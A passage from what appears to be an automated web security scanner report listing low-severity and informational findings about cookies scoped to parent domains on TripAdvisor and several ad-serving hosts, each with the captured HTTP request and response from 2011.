Set-Cookie: TASession=%1%V2ID.D003686BE8331A8DC70A23D10F4589D0*SQ.1*MC.11539*GR.23*TBR.31*EXEX.3*ABTR.21*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.hotelplanner%5C.com%2FHotel%2FHotelRoomTypes%5C.cfm%3FhotelID%3D113791%26inDate%3D10%2F04%2F11%26outDate%3D10%2F07%2F11%26NumRooms%3D1%26hrnQuoteKey%3Dc6d7ef83-2fb9-429a-9916-19c05c46dbab*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AYlcHw2yynj9VaPDGh0MhGA7WhW0nFykhjayN3jcE9A%2FT5BsMYvhPlw%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:28:31 GMT; Path=/
Set-Cookie: TACds=A.1.11539.1.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:28:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1307

GIF89av....:.........q.........m.Z.....n000...@@@...w.f...............w.e...```.....}...ppp...........} ...PPP........we7.!.YL)..`hX0.r>...<3...............g........L..Sb.NX.B...................
...[SNIP]...

13.29. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=A.2.12811.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:37:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2132

GIF89a..3.......w.f......DDE.........T.@...%%&...k.Y............TTU...sst...556.........`.Mccd............ddd.....s.................i..*..x..Z.qD%!..J_..b......D;%....Ym......sc<......5...........cV4I
...[SNIP]...

13.30. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/partner/tripAdvisorLogo-11007-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TACds=C.1.11539.1.2011-10-02; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.12*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals*FBH.2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:47 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.2.11007.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:01:47 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1211

GIF89ak...............q.?......trsQMO.....m....!..............|.....V...................**_O4..[.....}{gD...^cf.......TighZWX....~..i......EAA...=99_\_..............................................
...[SNIP]...

13.31. http://a.collective-media.net/adj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.guardian/;sz=300x250;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 416
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:50:07 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...

13.32. http://a.collective-media.net/cmadj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...

13.33. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=41533529378 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Mon, 03 Oct 2011 00:15:06 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sun, 01 Jan 2012 00:15:06 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:15:06 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

13.34. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:12 GMT;
Content-Type: text/html
Location: /z/i.cid?c=395973&ev=1&page=Samplehomepage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

13.35. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=3930898683&th=41533529378&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D26071%26s%3D26072&f=2&p=759881&a=1&rnd=755916 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:13:42 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1853089121 = new Image();\r\n tfimg1853089121.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\
...[SNIP]...

13.36. http://a.tribalfusion.com/z/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:28 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

13.37. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N270.N270.EMEA_StratDev/B3867719.15

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N270.N270.EMEA_StratDev/B3867719.15;u=pid=%pid!;,aid=%eaid!;,cid=%ecid!;;sz=1x1;ord=9364091? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 03 Oct 2011 00:39:59 GMT
Location: http://s0.2mdn.net/viewad/2195126/4-1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cadfdd83c0000d7||t=1317602399|et=730|cs=002213fd48bae36ca9fa1ef88a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:39:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:39:59 GMT
Server: GFE/2.0
Content-Type: text/html


13.38. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

13.39. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

13.40. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.advertisingcom/B2343920.49

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164%5E915323%5E1184%5E0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4435
Set-Cookie: id=c15cfd83c000083||t=1317600590|et=730|cs=002213fd480e0d8c5cbf724fda; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:50 GMT
Date: Mon, 03 Oct 2011 00:09:50 GMT
Expires: Mon, 03 Oct 2011 00:09:50 GMT
Cache-Control: private

